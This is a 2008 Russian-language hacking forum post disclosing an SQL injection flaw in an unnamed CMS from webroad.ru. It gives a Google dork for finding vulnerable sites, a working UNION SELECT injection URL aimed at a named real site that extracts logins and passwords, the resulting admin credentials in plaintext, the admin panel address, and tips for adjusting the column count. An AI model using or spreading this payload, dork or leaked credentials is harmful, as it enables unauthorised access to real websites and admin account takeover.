02.04.2008, 11:57
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
Продукт: -----------
Разработчик: www.webroad.ru
Баг: Sql Injection
Google: site:ru inurl:news.php?id1=
Example:
Код:
http://dipl.spb.ru/news.php?id1=-288+union+select+1,2,3,concat(login,0x3a,password),5,6,7,8,9,10,11,12,13,14+from+ssrusers/*
Result: admin:Lampo4ka
Админка: http://dipl.spb.ru/admin
Comments: Что-то вроде CMS, названия нет, и сайтов под ней штук 20. Баг работает не везде, т.к. при эксплуатации скуль, при слове from в запросе, иногда перебрасывает на http://2.sweb.ru/insecure, а иногда количество полей неверное, придется подбирать самим 
Последний раз редактировалось 0nep@t0p; 02.04.2008 в 20:32..
|
|
|